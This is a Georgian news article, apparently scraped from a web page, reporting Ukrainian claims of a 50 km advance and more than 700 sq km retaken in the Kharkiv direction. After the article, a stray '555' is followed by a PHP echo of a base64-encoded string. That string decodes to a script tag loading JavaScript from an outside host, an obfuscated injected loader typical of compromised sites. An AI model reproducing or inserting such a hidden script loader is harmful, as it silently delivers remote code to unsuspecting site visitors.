celsiusi
ავერსი საქკაბელი
უკრაინის შეიარაღებულმა ძალებმა ხარკოვის მიმართულებით 50 კილომეტრით წაიწიეს წინ და 20-ზე მეტი დასახლებული პუნქტი გაათავისუფლეს. უკრაინული მედიის ცნობით, ამის შესახებ ბრიფინგზე უკრაინის გენშტაბის მთავარი ოპერატიული სამმართველოს უფროსის მოადგილემ, ალექსეი გრომოვმა განაცხადა.
 
მისი თქმით, უკრაინის თავდაცვის ძალებმა თავრობის კონტროლის ქვეშ დააბრუნეს ხარკოვის ოლქში 700 კვადრატულ კილომეტრზე მეტი.
 
„ხარკოვის მიმართულებით თავდაცვითი ოპერაციის ფარგლებში დაკარგული ტერიტორიების აღდგენის მიზნით, მიმდინარე კვირის დასაწყისიდან უკრაინის შეიარაღებული ძალები ნაციონალური გვარდიისა და სხვა ძალოვანი სტრუქტურების დანაყოფებთან თანამშრომლობით აწარმოებენ აქტიურ საბრძოლო მოქმედებებს გარკვეული მიმართულებებით. გათავისუფლებულია რამდენიმე დასახლებული პუნქტი. უკრაინის კონტროლის ქვეშ დაბრუნებული ტერიტორიის საერთო ფართობი ხარკოვის იუჟნობუჟის მიმართულებით 700 კვადრატულ კილომეტრს შეადგენს“, – განაცხადა გრომოვმა.
 
​ამასთან, გრომოვის ცნობით, უკრაინის არმიამ გააუმჯობესა ტაქტიკური მდგომარეობა კრამატორსკის მიმართულებით და ორი კილომეტრით წაიწია წინ, ხოლო სავიანსკის მიმართულებით სამი კილომეტრით და გაათავისუფლა დასახლებული პუნქტი ოზერნოე. 
555
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");